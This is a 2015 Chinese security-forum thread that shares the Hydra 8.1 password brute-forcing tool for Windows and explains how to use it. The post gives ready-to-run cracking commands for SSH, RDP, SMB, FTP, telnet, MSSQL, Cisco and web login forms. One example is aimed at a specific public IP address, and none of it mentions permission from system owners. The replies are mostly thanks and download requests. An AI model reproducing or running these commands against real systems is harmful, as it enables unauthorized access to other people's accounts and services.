请选择 进入手机版 | 继续访问电脑版

SSS安全论坛

 找回密码
 立即注册

QQ登录

只需一步,快速开始

产品
产品
团队
团队
版规
版规
查看: 2511|回复: 25

[软件分享] 暴力破解工具-Hydra 8.1 windows版本命令行

[复制链接]
  • TA的每日心情
    奋斗
    2017-2-8 20:15
  • 签到天数: 138 天

    [LV.7]常住居民III

    发表于 2015-11-20 10:32:02 | 显示全部楼层 |阅读模式
    QQ截图20151118003527.png
    游客,如果您要查看本帖隐藏内容请回复


    回复可见下载地址
    用法:




    hydra.exe -l sa -P pass.txt -vV -s 1433 218.106.254.129 mssql




    -R 根据上一次进度继续破解-S 使用SSL协议连接-s 指定端口-l 指定用户名-L 指定用户名字典(文件)-p 指定密码破解-P 指定密码字典(文件)-e 空密码探测和指定用户密码探测(ns)-C 用户名可以用:分割(username:password)可以代替-l username -p password-o 输出文件-t 指定多线程数量,默认为16个线程-vV 显示详细过程server 目标IPservice 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2......) 使用案例: 使用hydra破解ssh的密码hydra -L users.txt -P password.txt -vV -o ssh.log -e ns IP ssh 破解https:# hydra -m /index.php -l username -P pass.txt IP https 破解teamspeak:# hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak 破解cisco:# hydra -P pass.txt IP cisco# hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable破解smb:# hydra -l administrator -P pass.txt IP smb破解pop3:# hydra -l muts -P pass.txt my.pop3.mail pop3破解rdp:# hydra IP rdp -l administrator -P pass.txt -V破解http-proxy:# hydra -l admin -P pass.txt http-proxy://10.36.16.18 破解telnet# hydra IP telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V  破解ftp:# hydra IP ftp -l 用户名 -P 密码字典 -t 线程(默认16) -vV# hydra IP ftp -l 用户名 -P 密码字典 -e ns -vVget方式提交,破解web登录:  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns IP http-get /admin/  # hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f IP http-get /admin/index.phppost方式提交,破解web登录:  该软件的强大之处就在于支持多种协议的破解,同样也支持对于web用户界面的登录破解,get方式提交的表单比较简单,这里通过post方式提交密码破解提供思路。该工具有一个不好的地方就是,如果目标网站登录时候需要验证码就无法破解了。带参数破解如下:<form action="index.php" method="POST"><input type="text" name="name" /><BR><br><input type="password" name="pwd" /><br><br><input type="submit" name="sub" value="提交"></form>  假设有以上一个密码登录表单,我们执行命令:# hydra -l admin -P pass.lst -o ok.lst -t 1 -f 127.0.0.1 http-post-form “index.php:name=^USER^&pwd=^PASS^:<title>invalido</title>”  说明:破解的用户名是admin,密码字典是pass.lst,破解结果保存在ok.lst,-t 是同时线程数为1,-f 是当破解了一个密码就停止,ip 是本地,就是目标ip,http-post-form表示破解是采用http 的post 方式提交的表单密码破解。  后面参数是网页中对应的表单字段的name 属性,后面<title>中的内容是表示错误猜解的返回信息提示,可以自定义。
    回复

    使用道具 举报

  • TA的每日心情
    擦汗
    9 小时前
  • 签到天数: 454 天

    [LV.9]以坛为家II

    发表于 2015-11-20 11:52:12 | 显示全部楼层
    这个真不错啊
  • TA的每日心情

    2017-1-21 15:36
  • 签到天数: 150 天

    [LV.7]常住居民III

    发表于 2015-11-20 12:54:22 | 显示全部楼层
    这个好。。赞
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2016-11-19 18:28
  • 签到天数: 117 天

    [LV.6]常住居民II

    发表于 2015-11-20 14:34:18 | 显示全部楼层
    支持!!!!!!!!!!!!!!!!
    回复

    使用道具 举报

  • TA的每日心情
    郁闷
    2016-5-28 16:34
  • 签到天数: 8 天

    [LV.3]偶尔看看II

    发表于 2015-11-20 19:10:40 | 显示全部楼层
    俺就看看   不说话
  • TA的每日心情
    开心
    2015-11-22 20:49
  • 签到天数: 31 天

    [LV.5]常住居民I

    发表于 2015-11-20 21:04:39 | 显示全部楼层
    先下下来,万一什么时候能用上呢
  • TA的每日心情
    擦汗
    前天 11:37
  • 签到天数: 275 天

    [LV.8]以坛为家I

    发表于 2015-11-21 20:12:13 | 显示全部楼层
    这个真不错啊
  • TA的每日心情
    擦汗
    2016-12-9 23:28
  • 签到天数: 32 天

    [LV.5]常住居民I

    发表于 2015-11-22 15:10:34 | 显示全部楼层
    看帖回帖是美德~
  • TA的每日心情
    开心
    2017-1-11 21:51
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2015-11-22 16:58:28 | 显示全部楼层
    学习来了。谢谢分享。
  • TA的每日心情

    2016-5-9 16:56
  • 签到天数: 4 天

    [LV.2]偶尔看看I

    发表于 2016-4-3 02:28:18 | 显示全部楼层
    拿走  谢谢lz 不错
    您需要登录后才可以回帖 登录 | 立即注册

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    关注微信赢邀请码

    QQ|Archiver|手机版|网站地图|网页地图|SSS安全论坛 ( 黔ICP备15010987号  

    GMT+8, 2017-2-28 17:56 , Processed in 0.194880 second(s), 34 queries .

    Powered by SSS团队 X3.2

    © 2014-2015 Comsenz Inc.

    快速回复 返回顶部 返回列表